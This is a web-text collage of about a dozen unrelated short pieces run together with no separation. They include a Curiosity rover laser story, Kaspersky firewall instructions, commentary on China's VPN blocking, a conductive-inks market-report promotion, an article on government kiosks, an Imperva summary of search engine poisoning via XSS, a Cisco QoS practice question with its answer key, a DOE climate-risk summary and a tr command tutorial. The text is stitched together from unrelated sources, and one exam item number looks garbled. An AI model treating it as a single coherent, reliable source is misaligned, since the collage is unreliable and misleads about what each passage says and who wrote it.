Since landing on Mars Aug. 6, 2012, NASA's Curiosity Mars rover has been exploring the planet's surface and conducting science experiments on soil and rocks. One of the mission's key milestones was reached this week when the rover's specialized on-board laser was fired for the 100,000th time as it continues to explore the planet's history. The laser, called ChemCam, is fired each time at a rock, creating a little ball of plasma or debris, Roger Wiens, the principal investigator of the ChemCam team, told eWEEK. "It abrades some material off of the rock's surface, like a little ball of flame," said Wiens, who is a planetary scientist at the Los Alamos National Laboratory, where the laser was developed. After each shot, special instruments on the rover capture the spectral signatures of the laser firing, which are used to identify the elements that make up the soil on Mars, he said. Photographs are also taken to document the laser firing and to build a history of the experiments. The ChemCam laser marks the first time that scientists on Earth have been able to do this kind of research on Mars, said Wiens. A previous Phoenix lander sent to Mars had a laser, but it was aimed into the planet's atmosphere and couldn't collect information about the rocks on Mars. Other Mars lander missions used a robotic arm to scoop up soil for analysis, but that limited data collection to materials that could be grabbed by the arm, said Wiens. "So it took more effort than just point and shoot," like researchers are able to do with the laser. "This mission provides much more data collection."
Applies to Kaspersky Small Office Security 2 for Personal Comuter All network connections on your computer are monitored by Firewall. Firewall assigns a specific status to each connection and applies various rules for filtering of network activity depending on that status, thus, it allows or blocks a network activity. Firewall works based on rules of two types: packet rules and rules for applications. Packet rules have a higher priority compared to the application rules. If both packet rules and application rules are applied to the same type of network activity, this network activity will be processed using the batch rules. Packet rules are used in order to restrict packets transfering regardless applications. Creating a network rule In order to create packet rule, perform the following actions: - open the main application window - on the upper right hand corner of the window, click Settings - on the upper part of the Settings window, select Protection - on the left hand part of the Settings window under Protection, select Firewall make sure that the Firewall component is enabled (the Enable Firewall box is checked) on the right hand part of the Settings window, click Settings on the Firewall window ,go to the Filtering rules tab click on the Add link. The Network rule window appears specify the required parameters once the required parameters are specified, click on the OK button click OK on the Firewall window click OK on the Settings window close the main application window. Network rule parameters While creating a network rule you can specify an action performed by Firewall if it detects the network activity: The Allow or Block rules can be logged. In order to do this, check the Log events box. If you want to create a packet rule you need to set network service. Network service contains types of network activities, which are restricted according to a network rule. You can select the type of network activity or create a new by clicking the Add link. 
A network service includes the following parameters:
- Protocol. Firewall restricts connections via the TCP and UDP protocols.
- Direction. Firewall controls connections in the following directions:
  - Inbound (stream). The rule applies to network connections created from another computer.
  - Inbound / Outbound. The rule applies to inbound and outbound data packets and data streams, regardless of direction.
  - Outbound (stream). The rule applies only to network connections created by your computer.
- Remote and Local ports. You can specify the TCP and UDP ports used by your computer and by remote computers; these ports will be controlled by Firewall.

You can also specify network addresses. You can use an IP address as the network address or specify a network status; in the latter case, the addresses are copied from all connected networks that have the specified status at that moment. You can find detailed instructions on how to set a range of IP addresses in KB6480. You can select one of the following address types: Addresses from group. The rule is created for IP addresses from the specified range. Select one of the address groups; if the group you need does not exist, you can create a new one. To do this, click the Add link in the lower part of the section and specify the addresses in the Network addresses window that opens.
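The priority scheme described above — packet rules evaluated before application rules, with the first matching rule deciding the outcome — can be sketched as follows. This is a minimal illustrative model, not Kaspersky's actual implementation; the rule structure, field names, and default action are assumptions.

```python
# Illustrative model of Firewall rule evaluation: packet rules are
# checked before application rules, and the first matching rule wins.
# Rule fields mirror the parameters described above (protocol,
# direction, remote port); all names here are hypothetical.

def match(rule, conn):
    """A rule matches when every field it specifies equals the connection's."""
    return all(conn.get(k) == v for k, v in rule["filter"].items())

def decide(packet_rules, app_rules, conn):
    # Packet rules have higher priority, so scan them first.
    for rule in packet_rules + app_rules:
        if match(rule, conn):
            return rule["action"]
    return "allow"  # assumed default when no rule applies

packet_rules = [{"filter": {"protocol": "TCP", "remote_port": 23,
                            "direction": "inbound"},
                 "action": "block"}]
app_rules = [{"filter": {"protocol": "TCP"}, "action": "allow"}]

conn = {"protocol": "TCP", "remote_port": 23, "direction": "inbound"}
print(decide(packet_rules, app_rules, conn))  # prints: block
```

Even though the application rule would allow all TCP traffic, the more specific packet rule is consulted first and blocks the inbound Telnet connection — the same precedence the article describes.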
Recently, China has tightened its control over VPNs (virtual private networks), the systems that allowed many of its people to access banned sites. Basically, a VPN is a private network that sends and receives data through public systems. It remains private through a combination of dedicated connections and encryption, and is like a shield through which users can view the internet away from prying eyes. In the Western world, many users employ VPNs to surf in complete privacy, ensuring that their browsing data is protected by encryption at all times. Considering the new proposed legislation in the UK that would force all ISPs to save all of the browsing data of all of their users, and the prevalence of data-logging software in general, it’s easy to see why many users may choose to use a VPN simply as a matter of principle. In China, however, VPNs are usually used to get around the Great Firewall and access censored information in safety. They are also often used by banks and other businesses to ensure the complete privacy of their data exchange. Currently, many connections are being terminated where a VPN is detected. While VPN providers can work around these blockages, Chinese censors can identify the work-around and block it just as quickly. Whether this is or is not the case remains to be seen, but it seems as though the situation is an unacceptable one for many businesses that simply cannot operate without the security of a VPN. Rather than risk having their corporate communications glimpsed by competitors (who could easily utilise underhanded tactics to gain sensitive information if it wasn’t enclosed in the safety of a VPN), many international companies will choose to withdraw from China altogether. Additionally, many international businesses operating in China rely on access to the international internet services they are able to reach through a VPN. Without these services, they would be unable to operate. 
This may seem like a strange move for the Chinese authorities to make, considering the impact it could have on their economy, but perhaps it is a sacrifice they are willing to make if it means mainland Chinese internet users are forced to rely on the domestic e-commerce industry. Considered from this angle, it does in fact seem like a direct attack on international business, and a way of protecting their economy from the dominance of international corporations.

The Chinese market is a significant one. With 500 million users, it's not surprising that Mark Zuckerberg of Facebook is said to be in negotiations to bring a version of Facebook to the country (having recently been spotted in China with his wife). In the absence of major web services such as Facebook, Twitter, and YouTube, China has, however, developed its own versions that comply with the censor's demands.

The US is known for being vocal about its advocacy of free speech. Most recently, they were the first to refuse to sign the updated version of the ITU treaty proposed at the WCIT (world conference on international telecommunications), supposedly because it would have allowed for greater levels of governmental control over the internet. As the world leader in the area of e-commerce and social media, the US is the country that has the most to lose from censorship. While they may well hold the principle of free speech in high regard, it's worth bearing in mind that this is less about morals and more about economics.

There is no doubt that users in China will find a way to circumvent these new blockages and access the international internet as they always have done. In April last year, security experts publicly posted a guide to getting around the Chinese blockage of the Tor network, because each time the Great Firewall is upgraded, the ways around it are simply modified too. These ways are illegal, however, which means that international businesses won't legitimately be able to use these methods.
This new situation in China may seem like another small gaining of ground for censorship, but as Chinese dissident artist Ai Weiwei said in The Guardian last year, ultimately China’s leadership will have to understand that they simply "can’t control the Internet unless they shut it off", just as they can’t control the free flow of ideas. In Weiwei’s words, "ultimately the Internet is uncontrollable. And if the Internet is uncontrollable, freedom will win."
A conductive ink (CI) is a thermoplastic viscous paste that conducts electricity by incorporating conductive materials such as silver and copper. The ink comprises a binder, a conductor, a solvent, and surfactants used during its manufacturing process. The North America conductive inks market was valued at $291.6 million in 2012 and is projected to reach $378.8 million by 2018, growing at a CAGR of 5.5% from 2013 to 2018. Photovoltaics is the major application of conductive inks in the North America market, closely followed by membrane switches.

The binder holds together all the conductive materials in the ink and gives the product structural support; it is particularly important in applications that require high reliability and flexibility. The conductor is the component that allows the passage of electricity; conductors used in conductive inks include silver, copper, nickel, and aluminum. The solvent forms the solution, while the surfactants help the ink mix uniformly. Conductive inks have various applications, such as photovoltaics, membrane switches, automotive, RFID/smart packaging, biosensors, printed circuit boards, and others.

The North American chemical industry is a significant part of the region's economy. The U.S. is the largest chemical producer in North America, followed by Mexico and Canada. In the past, most of North America's chemical industry growth was driven by domestic sales, but today growth depends on both the domestic and export markets. Silver flake conductive inks are in high demand in the North America conductive inks market, on account of increasing usage in end-user industries. The key countries covered in the North America conductive inks market are the U.S., Canada, and others.
The types of conductive inks studied include conductive silver ink, conductive copper ink, conductive polymers, carbon nanotube ink, dielectric inks, carbon/graphene ink, and others. Further, as part of its qualitative analysis, the North America conductive inks market research report provides a comprehensive review of the important drivers, restraints, opportunities, and burning issues in the conductive inks market. The report also provides an extensive competitive landscape of the companies operating in this market, including company profiles of, and competitive strategies adopted by, various market players, such as Applied Nanotech Holdings Inc. (U.S.), Conductive Compounds Inc. (U.S.), Creative Materials Inc. (U.S.), and E.I. Du Pont De Nemours and Company (U.S.). With market data, you can also customize MMM assessments to meet your company's specific needs. Customize to get comprehensive industry standards and deep-dive analysis of the following parameters:
- Market size and forecast (deep analysis and scope)
- Competitive landscape with a detailed comparison of each company's portfolio, mapped at the regional and country level
- Analysis of forward-chain and backward-chain integration to understand the business approach prevailing in the North America conductive inks market
- Detailed analysis of competitive strategies such as new product launches, expansions, mergers & acquisitions, etc.
adopted by various companies and their impact on the North America conductive inks market
- Detailed analysis of various drivers and restraints and their impact on the North America conductive inks market
- Upcoming opportunities in the conductive inks market
- Trade data for the CI market
- SWOT analysis for top companies in the conductive inks market
- Porter's five forces analysis for the conductive inks market
- PESTLE analysis for major countries in the conductive inks market
- New technology trends in the CI market

Please fill in the form below to receive a free copy of the summary of this report. Please visit http://www.micromarketmonitor.com/custom-research-services.html to specify your custom research requirement.
In the early 1990s, many federal and state agencies promoted kiosks as an effective way of disseminating information and government services to the public. In practice, deployment proved more complex than first envisioned. In addition to shrinking public-sector budgets, kiosk programs were plagued by a number of factors -- chiefly, the widespread notion of the Web as a competing medium, the high cost of kiosk deployment, lengthy procurement cycles and the two- or three-year pilot project required to come up with a kiosk system of value to the public. According to Summit Research Associates President Francie Mendelsohn, kiosk projects also faltered from a lack of clear planning and too little thought to applications, design and maintenance. Ironically, these same factors later became learning experiences that contributed to successful kiosk models developed by Georgia; Ontario, Canada; New York City; Texas; and the federal Department of Housing and Urban Development (HUD). For the purposes of this discussion, "kiosk" refers to Internet-enabled, interactive kiosks designed primarily to disseminate information and government services to the public.

Influence of the Web

Initially, many considered the Web a simpler, more cost-effective method of providing information for citizens than public-access kiosks. Government agencies that might have supported kiosk programs shifted resources into developing Web sites. By 1996, high-visibility kiosk projects in several states were stalled or shelved altogether. To some, the kiosk was another Betamax. North Communications Senior Vice President of Marketing Rick Rommel said this view of the Web is short-sighted. "The Web is not a competitor to kiosk deployment; it is a synergistic technology. It enhances kiosk control and applications," he said. "Also, the Web doesn't reach all citizens; in fact, it can be argued that those who need public services the most have the least access to high-tech service-delivery channels."
Mendelsohn agreed with this view. "Generally, the very people who need public services the most -- the poor, the homeless, the disabled, the disadvantaged -- do not have access to a computer or to the Web." Although computers are available in libraries, the people Mendelsohn refers to are not likely to have the skills to use them. By contrast, kiosks providing touch-screen navigation require no computer skills, only the ability to push a few buttons and read the directions for using them. "A public-access kiosk," Rommel added, "is an easy way for some people to get the information they need, rather than trying to ferret it out wandering through the Web. One of the major attributes of this technology is that it presents only information necessary to meet the needs of the user." Depending on the number of units in a kiosk network, physical infrastructure and software are the major costs. In small networks of one to 10 units, system design and programming represent the highest costs. In systems of 100 or more units, hardware and maintenance are the big-ticket items. Either way, Rommel said that without a suitable application suite, expenses could outweigh benefits for a single agency. Public agencies have tried several solutions to mitigate the overall expense of kiosk projects, including spreading the cost over several agencies; partnering with private-sector companies that design, manufacture and operate Internet-enabled kiosk networks; charging local advertisers for program space; and charging user fees for transactional services, such as paying parking tickets, obtaining hunting licenses, renewing drivers' licenses and applying for license plates. Government entities may also partially offset costs by assigning a dollar value to staff hours saved as a result of automating information and selected transactions. Some vendors offer to install and maintain kiosk systems at no charge, in exchange for revenue-sharing agreements. 
In such arrangements, the contractor generally formats program changes received from the sponsoring agency, then downloads them via the Internet or intranet to designated kiosks. Mendelsohn said some state and local governments are wary of this type of arrangement. "They feel that if the project doesn't generate the revenue the vendor expects, what's to prevent them from pulling up their kiosks and leaving town?" she said. "In some cases, they've done that. So arrangements with vendors depend on the mindset of the state or local government."

Lengthy procurement cycles, characteristic of government transactions, have also derailed projects. According to Rommel, it can take two or even three years to get a project deployed. "In the meantime, we, the manufacturers, may go through two or three generations of technology and deployment approaches," he said. "During that time, the internal champions for a project may migrate somewhere else. The result: inconsistency of vision and wavering support for the project." That happened with a U.S. Post Office kiosk project, he added. "They got caught in one of the long procurement cycles. It took them so long that by the time they were ready to deploy, the management supporting it rolled over, and a new crew came in with new agendas."

It is interesting that the technology many thought would send kiosks to the boneyard actually made them more attractive to government. From Web technology came the intranet, private networks with the same protocols and hypertext links as the Web. Intranet-enabled kiosks around the country could now be programmed, controlled and monitored from central locations. No longer was it necessary to have technicians on the road, constantly tweaking and updating individual units. Web technology not only made the Internet-enabled kiosk a reality, it helped bring government services closer to those most in need of them.
A few kiosks with transactional service capability also take credit cards, enabling users to pay parking tickets, renew drivers' licenses and buy hunting and fishing licenses. Government-sponsored kiosks may have tourist information and advertisements for hotels and restaurants. Some of these kiosks have telephones for making reservations. They may dispense discount coupons for special events or have a digital camera for taking pictures that can be sent via e-mail. Most public-sector kiosks also have printers. Mendelsohn stressed the importance of using printers specifically designed for kiosk applications -- durable systems with the ability to handle large paper rolls, and programming that limits printouts to only the information needed. "The public has no use for six pages of HTML headers. Store owners in shopping malls are furious when kiosks litter their area with paper." Mendelsohn said the three keys to kiosks are the same as the three rules of retail success: location, location, location. "Kiosks placed in city hall have not done well. People don't just stroll into city hall unless they have specific business there. But when kiosks are in shopping malls, grocery stores, and other places where the public just goes in the course of a regular day, they've been much more successful." Mendelsohn stressed simplicity -- uncluttered touch-screens and a simple front end with a few buttons and instructions for using them. Instead of being confronted by sophisticated Web browsers, kiosk users see a vastly simplified graphic user interface (GUI) that translates user commands to an unseen Web browser. "An intuitive GUI with four or five navigation buttons makes it easier for users to go to the next screen, go back or print," Mendelsohn said. "Considerable testing has shown that people want information on one screen; they are very unlikely to hit the 'next' button. "Smarter organizations will copy much of the information on their Web site to the kiosk. 
You don't have to reinvent the wheel, design all the applications a second time to run on the kiosk," he continued. "The information can be the same as what is on the Web site, only not nearly as much. Also, a fallback, a canned operation, is essential for those times when connection to the Internet fails. Better-designed units have remote monitoring capability and can automatically restart when the connection is down. If people see that a kiosk is out of service every time they walk past, it's doomed." Mendelsohn also stressed visual consistency; sites for each government department should have a similar appearance. "At least have the opening screen look the same. After the first page, if necessary, they can resume their individual appearance," he said. "But there has to be some commonality somewhere, otherwise, people get confused." A system of measuring public response has been incorporated in most successful kiosks. These programs typically record the number of hits the kiosk receives. They indicate which applications are used the most, which ones the least. They also indicate the time users remain with a particular application and the overall time spent at the kiosk. Kiosk programs operated by several states, major cities, and government departments suggest kiosks are, in fact, fulfilling a need for direct access to government services and information. This is especially true for kiosks that offer a wide range of transactional services. * Georgia: Working on its own, the Georgia Net Authority (GNA) took only six months to completely reengineer 110 kiosks inherited from the 1996 Olympics Project. Initially funded by the U.S. Department of Transportation, the statewide system was largely a flop, extremely slow, difficult to use and without central control. Someone had to be on the road full time to see if individual units were up or down, and to update programs and applications by popping in a new CD. 
GNA replaced the original Windows 95 operating system with Windows NT, increasing system speed by a factor of 1,000. It installed an intuitive interface designed for touch-screen kiosks, incorporated usage measurement software, and brought the system into a frame-relay network so it could be centrally controlled and monitored. "Our system is online 24 hours, 7 days a week," said GNA Executive Director Tom Bostick. "And from what we've been told, it is one of the largest statewide kiosk networks in the country." GNA kiosk applications include current weather for any Georgia city, weather-radar pictures, travel directions and information on restaurants, hotels, tourist attractions, and other points of interest. Users can look up airport information at the airport, including flight arrivals, departures and gate numbers. "The information is all live," Bostick said. "Users can even check out the traffic on the interstate highways around Atlanta." Bostick said the 1.5 million hits per month attract funding from the private sector. "We're using that data to generate revenue by marketing kiosk advertising. If a business already has a listing in the kiosk program, we point out that for a small annual fee, we can enhance their listing with a logo and a picture of their hotel, motel, inn or restaurant," he said. "We are also working with other major sponsors. The Atlanta Convention and Business Bureau wants us to put 20 kiosks in selected sites around the city, in exchange for an ongoing monthly fee." The GNA is presently considering the addition of a keyboard, a feature that will open up even more applications. * Ontario, Canada: Service Ontario is a highly successful kiosk network operated by the Canadian province in partnership with IBM. Started as a pilot program in 1993, it now has 61 units, mostly in shopping malls in Toronto and Ottawa. 
The popularity of the system is due mainly to the convenience it offers the public in being able to register motor vehicles, buy license plate stickers, get printouts of driving records and run history searches on used vehicles. Users can also pay fines for parking and moving violations, renew drivers', hunting and fishing licenses, and file change-of-address forms required by government agencies. "We run a user-satisfaction survey of two or three questions with each transaction performed," said Senior IBM Consultant Bill Clarke. "That's how we measure system performance in terms of customer satisfaction. So far, they're telling us we're on the right track." The combination of transaction-user fees and the internal value of the system makes Service Ontario a self-supporting operation. According to Summit Research Associates' Mendelsohn, tens of thousands use this system every month. "When I'm asked, what is the most successful public-sector kiosk you've seen, my answer has been the same for four years -- Service Ontario."

* New York City: A three-year pilot program showed New York City that enough of its citizens use kiosks to warrant serious rollout. According to Mendelsohn, the city is accepting bids for deployment of 1,000 units throughout all five boroughs. "Now, it's down to figuring the best business deal they can cut to get these units deployed." Mendelsohn said New York has scrutinized every aspect of kiosks, from public acceptance of their value to cost structure and long-term maintenance. "They see a tremendous value to their citizens in putting these things out -- people are using them." Once, during the pilot program, Mendelsohn was observing three kiosks in Brooklyn. "I was there for several hours, and there was a steady stream of people using them. The no-attention span of New Yorkers gave rise to the phrase, 'New York Minute,' but New Yorkers are using these things and finding them wonderful.
They say, 'We have access to city services without the attitude.'"

* Texas: Info Texas is a tenant model installed by North Communications, at no cost to the state. "Our key tenant is the Texas Workforce Commission (TWC)," Senior Vice President Rommel explained. "TWC pays North for the residency of their applications on the kiosks. We have about 80 units in this model in Texas." Under an agreement with the TWC, North Communications can market the kiosks to other public agencies and to the private sector, although the TWC has final approval over content. Originally, the agency was responsible for all the kiosks. Today it operates only 20, under an agreement with the Department of Human Services. The remaining units are under the control of local TWC boards, although public information appearing on units operated by the agency is also on all the rest. Programs are in English and Spanish. Users can look for job openings, register for work, fill out applications and get information on youth employment and unemployment insurance. With all that time saved, one might have expected staff layoffs, but that wasn't the case, said Mike Fernandez, director of the TWC's Technology and Facilities Management Division. "Staff that formerly spent much of their time and effort answering routine inquiries are now involved in job development and direct services. So the kiosk program has had measurable value for the government, although it would be difficult to quantify the savings." Fernandez said Info Texas has been in place for about six years. "Based on feedback from the public, we view the kiosk as a very positive program."

* HUD: The U.S. Department of Housing and Urban Development put out its first kiosks last May, initially in "high tower" federal buildings, but quickly yanked them out and installed them in shopping malls, supermarkets, public buildings and in their new street-level, storefront offices.
"The intent," said Candi Harrison, Web manager for HUD's Internet home page, "is to get ourselves out to the people instead of making them come to us." The department has 26 "Next Door Kiosks" in cities nationwide, offering information on buying homes, finding affordable rentals, locating homeless shelters, and getting instructions on filing a housing discrimination complaint. Users can check to see if they are owed a refund on FHA mortgage loans. They can pull up a list of HUD-approved lenders, and find out what HUD properties are for sale in the area. The kiosks also have an interactive mortgage calculator; users can plug in basic information and find out whether they qualify for an FHA mortgage. The information is available in English or Spanish and is updated daily for the kiosk's area. Printouts are free. The cost of each unit is about $16,000. Harrison said people often ask her if the system is worth the cost. "Of course it is. If government can provide information of value to the people, then it's the right thing to do." According to a recent study by Frost & Sullivan of Mountain View, Calif., market revenues from world government kiosks reached $139.8 million in 1997, a growth of about 52 percent over the previous year. Since many public agencies also market kiosk advertising space to hotels, restaurants and special events, it should be noted that kiosk market revenues from tourism and entertainment totaled $52 million for the same year, an increase of 36 percent over 1996. Governments' continued efforts to streamline public service is one of the factors driving growth in the world government kiosk market. Technology is another. The incorporation of new magnetic card readers, pointing devices, microphones, cameras, proximity detectors, printers, keyboards, force-vector touch screens, flat screens and other developments will inevitably reduce the size and lower the cost of kiosk systems while improving reliability. 
As cost is reduced and kiosks continue to be recognized as an effective medium of providing information and government services, they may, in fact, become the vending machine of the Information Age. Bill McGarigle is a writer specializing in communications and information technology. He lives in Santa Cruz, Calif. Email
Analysis is finding the root cause of a problem. It can also be trying to understand the user requirements or finding ways & means to achieve an objective. You can refer to the dictionary for its meaning. In software engineering, it's a phase which occurs after planning and before design. It's basically done to understand the user requirements and condense them into specifications. It also helps to attain clarity of objective. SDLC - Software Development Life Cycle: the process through which software is engineered or developed. For more details you can refer to Software Engineering (4th Ed.) by Roger Pressman.
Search Engine Poisoning: On The Rise

Today, Imperva released a report on search engine poisoning (SEP). SEP attacks manipulate, or "poison," search engines into displaying search results that contain references to malware-delivering websites. There are multiple methods of performing SEP: taking control of popular websites; using the search engines' "sponsored" links to reference malicious sites; and injecting HTML code.

How has hacker interest in SEP grown? This is very difficult to gauge, and no formal statistics quantify the problem. However, as the recent Bin Laden death reminds us, hackers leverage current events as they happen to dupe search engine users. The first description of the attack by researchers was in March 2008, by Dancho Danchev. One metric that helps gauge the growth of this problem is hacker forum discussion. For example, one major hacker forum saw a dramatic increase in discussions regarding search engine poisoning with XSS.

Year-over-year growth of SEP discussions in hacker forums (percent growth):
- 2008 - 2009: 212%
- 2009 - 2010: 121%

(A second chart showed the same growth in raw numbers.)

How does Imperva detect SEP? Our probes were able to detect and track a SEP attack campaign from start to end. The prevalence and longevity of this attack indicate not only how long it went undetected, but also that companies are not aware they are being used as conduits of an attack. It also highlights that search engines should do more to improve their ability to accurately identify potentially harmful sites and warn users about them. The attack method we monitored returned search results containing references to sites infected with Cross-Site Scripting (XSS). The infected Web pages then redirect unsuspecting users to malicious sites where their computers become infected with malware.
This technique is particularly effective because the criminal doesn't take over, or break into, any of the servers involved in the attack. Instead he finds vulnerable sites, injects his code, and leaves it to the search engine to spread his malware. The prevalence of this attack has ramifications for search engines, especially Google. Current solutions that warn the user of malicious sites lack accuracy and precision, and many malicious sites continue to be returned unflagged. However, these solutions can be enhanced by studying the footprints of SEP via XSS. This allows more accurate and timely notification, as well as prudent indexing. We hope Google and Yahoo! step up.
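One way to study the "footprints" of SEP via XSS mentioned above is to flag search-result URLs whose query strings carry script-injection payloads. The sketch below is a simplified illustration of that idea, not Imperva's actual detection logic; the pattern list and function name are assumptions.

```python
import re
from urllib.parse import urlsplit, unquote

# Hypothetical footprint check: a reflected-XSS SEP link typically hides
# a script or redirect payload inside the query string of a legitimate,
# vulnerable site. These two patterns are illustrative only; a real
# detector would use a much richer signature set.
SUSPICIOUS = [
    re.compile(r"<\s*script", re.IGNORECASE),          # injected <script> tag
    re.compile(r"document\.location", re.IGNORECASE),  # JavaScript redirect
]

def looks_like_sep_xss(url):
    # Decode percent-encoding first (%3Cscript%3E -> <script>), since
    # payloads are usually URL-encoded to survive indexing.
    query = unquote(urlsplit(url).query)
    return any(p.search(query) for p in SUSPICIOUS)

clean = "http://example.com/search?q=cheap+tickets"
poisoned = ("http://victim.example/page?q=%3Cscript%3E"
            "document.location='http://malware.example'%3C/script%3E")
print(looks_like_sep_xss(clean))     # prints: False
print(looks_like_sep_xss(poisoned))  # prints: True
```

Note how the poisoned URL points at the *victim's* legitimate domain: consistent with the article, the attacker never breaks into a server, he only plants a payload that the vulnerable page reflects and the search engine indexes.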
Foresight for a Smarter Planet

Kathy MacWillliams

This teaching module combines IBM Smarter Planet Initiative materials and website with basic foresight skills in such a way as to fit into a broad range of courses in business, engineering and the social sciences. The basic foresight skills involve understanding trends, a systems approach and the articulation of a preferred future. Combining these skills with IBM's extensive online library and interactive serious game provides the structure for a stand-alone module, or, with sufficient elaboration, could provide the framework for an entire course.
The operating room has four speakers in the ceiling for the computer's use, and a microphone for the surgeon to communicate with it. White and IBM experimented with different microphones and adjusted the voice application to filter out common noises, such as pumps and equipment beeps, to prevent interference. At the start of an operation, the doctor directs the computer to read vital data from the clinical database, such as the patient's name, diagnosis and the procedure to be performed. This ensures everyone in the room is on the same page before the start of surgery. Once the surgeon says the word "incision," the computer times the operation and notifies personnel when they need to perform such actions as giving the patient his next dose of anesthetic. This allows them to concentrate on the patient, rather than watching the clock, and reduces the likelihood of error. The doctor can also record data into the patient's file during the operation. For example, he can direct the camera to take a picture and record a description rather than having to remember the specifics of the photo later. "Pictures used to be stored without data because I couldn't enter it while operating," said Dr. Burke. "Voice opens up an entirely new source of data occurring at the point of care when it is freshest and most accurate."

Paging Dr. Digital

Adler of Gottlieb Memorial tried using pagers and cell phones to keep in touch with the staff, but found this unsatisfactory. Instead, the hospital now uses wireless communication badges from Vocera Communications. These two-ounce badges can be worn on a lanyard around the neck or clipped to clothing. The badges access the hospital's 802.11b wireless LAN to connect to the Vocera Server. The server sends messages to another badge over the WLAN, or links to the hospital's PBX to connect to phone lines. The hospital has 320 of the badges, shared by the 800 staff on three shifts.
The badges have a built-in microphone and speaker, and the server uses voice recognition software to interact with the wearer. The user can reach another person by name, nickname, external phone number, internal phone extension, job title or other description such as "the nurse covering Room 48B." Since the user's location can also be tracked, someone can give a command like "connect me to the nearest security guard." For privacy, users have the option of plugging a headset into the badge, but in most cases the users will go to a private area or transfer the call to a land line before discussing patient information. "One of our biggest concerns is with HIPAA (Health Insurance Portability and Accountability Act)," Adler explained. "We did a lot of training on not having conversations about sensitive patient information, and we don't have physician conversations in the patient rooms." However, there are some advantages to having the patients hear conversations. For example, when the patient speaks Spanish, an interpreter can be reached through the badge and the conversation conducted immediately without an interpreter having to come to the patient's room. There are trade-offs, though. The badges have an LCD screen on the back for text messages and email, but that screen is too small to use with the telemonitoring system nurses use to see results from a patient's heart monitor. Thus certain nurses carry a separate device for that purpose. Adler said that Vocera is looking at a larger form factor that could also be used for telemonitoring. But she isn't sure if the hospital will change to the larger devices. "I don't know if we want to go to a dual use for these devices," she said. "Right now the weight is perfect and the way in which you use it is so easy."
Describe QoS considerations

Questions derived from the 642-845 - Optimizing Converged Cisco Networks Cisco Self-Test Software Practice Test.

Objective: Describe QoS considerations
SubObjective: Explain the necessity of QoS in converged networks (e.g., bandwidth, delay, loss, etc.)
Item Number: 642-822.214.171.124

Question (multiple answer, multiple choice): Which delay types are categorized as fixed delay? (Choose two.)
A. Propagation delay
B. Queuing delay
C. Serialization delay

Answer: A. Propagation delay; C. Serialization delay

Explanation: Propagation and serialization delays are examples of fixed delay. Propagation delay is the amount of time it takes the bits of a frame to travel across the physical wire. Propagation delay is typically ignored because it is bounded by the speed of light. In contrast, serialization delay is the amount of time it takes to place the bits of a packet, encapsulated in a frame, onto the physical media. Most fixed delay is due to propagation and serialization, whereas variable delay is due to queuing. Queuing delay is the amount of time that a packet sits in a queue. Jitter describes delay variation; it occurs when the end-to-end delay is changing. Voice and video traffic can handle some delay as long as the delay is constant. However, if the delay from point A to point B is constantly changing, the quality of voice and video traffic will be affected.
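The fixed/variable distinction is easy to make concrete for serialization delay, which is simply frame size divided by link bandwidth. A minimal sketch, where the 1500-byte frame and T1 link speed are assumed example values, not figures from the question:

```shell
# Serialization delay = frame size in bits / link bandwidth in bits per second.
# Example values (assumed): a 1500-byte frame on a 1.544 Mbps T1 link.
frame_bytes=1500
link_bps=1544000
delay_ms=$(awk -v b="$frame_bytes" -v r="$link_bps" \
    'BEGIN { printf "%.3f", (b * 8 / r) * 1000 }')
echo "serialization delay: ${delay_ms} ms"
```

Unlike queuing delay, this number never changes for a given frame size and link speed, which is exactly why serialization delay is classified as fixed.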
The Nation's energy infrastructure isn't just at risk from online security rogues. The US Department of Energy today released a report that details the growing dangers our ever-changing environment poses to the energy infrastructure, and they sound every bit as threatening as some of the online threats. The "US Energy Sector Vulnerabilities to Climate Change and Extreme Weather" report observes that annual temperatures across the United States have increased by about 1.5°F over the last century. It notes that 2012 was both the warmest year on record in the contiguous United States and saw the hottest month since the country started keeping records in 1895. For the energy arena, the DOE says, all of this means:

- Increased risk of temporary partial or full shutdowns at thermoelectric (coal, natural gas, and nuclear) power plants because of decreased water availability for cooling and higher ambient air and water temperatures. Thermoelectric power plants require water cooling in order to operate. A study of coal plants, for example, found that roughly 60% of the current fleet is located in areas of water stress.
- Reduced power generation from hydroelectric power plants in some regions and seasons due to drought and declining snowpack.
- Risks to energy infrastructure located along the coast from sea level rise, increasing intensity of storms, and higher storm surge and flooding, potentially disrupting oil and gas production, refining, and distribution, as well as electricity generation and distribution.
- Increasing risks of physical damage to power lines, transformers and electricity distribution systems from hurricanes, storms and wildfires that are growing more intense and more frequent.
- Increased risks of disruption and delay to fuel transport by rail and barge during more frequent periods of drought and flooding that affect water levels in rivers and ports.
- Higher air conditioning costs and risks of blackouts and brownouts in some regions if the capacity of existing power plants does not keep pace with the growth in peak electricity demand due to increasing temperatures and heat waves.

An Argonne National Laboratory study found that higher peak electricity demand as a result of climate change related temperature increases will require an additional 34 GW of new power generation capacity in the western United States alone by 2050, costing consumers $45 billion. This is roughly equivalent to more than 100 new power plants, and doesn't include new power plants that will be needed to accommodate growth in population or other factors, the DOE stated. "Potential future opportunities for federal, state, and local governments could include innovative policies that broaden the suite of available climate-resilient energy technologies and encourage their deployment, improved data collection and models to better inform researchers and lawmakers of energy sector vulnerabilities and response opportunities, and enhanced stakeholder engagement," the DOE stated.

The report went on to detail some of the new technologies that could be deployed (and in some cases already are being deployed) to combat climate issues. Some of the ideas include:

- Water-efficient technologies for fuels production, including conventional oil and natural gas, shale gas, shale oil, and coalbed methane.
- Improved energy efficiency and reduced water intensity of thermoelectric power generation, including innovative cooling technologies and non-traditional water supplies (such as municipal wastewater or brackish groundwater).
- Increased use of drought-tolerant crop varieties for bioenergy production and more water-efficient conversion of biomass into biofuels.
- Increased resilience of energy infrastructure to wildfires, storms, floods, and sea level rise, including hardening of existing facilities and structures.
These activities will increase the resilience of our energy infrastructure by "hardening" existing facilities and structures to better withstand severe droughts, floods, storms or wildfires, and by contributing to smarter development of new facilities.
tr is one of the core commands in Linux/Unix, but very few seem to have a solid grasp of it. Its basic function is to translate string content given to it via STDIN from one thing to another. What makes this command unique is the fact that it doesn't read from files; instead, it takes input from STDIN. This may seem a bit strange at first, but it's quite easy to get used to, as you'll see in the examples below.

The way tr works is that it takes two "sets" of content from the user: think of the first as the original, and the second as the replacement. Perhaps the most basic illustration of this is simply changing one character to another:

tr a b < originalfile > newfile

This would very simply change, for the entire original file, all instances of the letter a into the letter b. A slightly more complex exercise would be changing all lowercase letters in the alphabet to uppercase:

tr 'a-z' 'A-Z' < originalfile > newfile

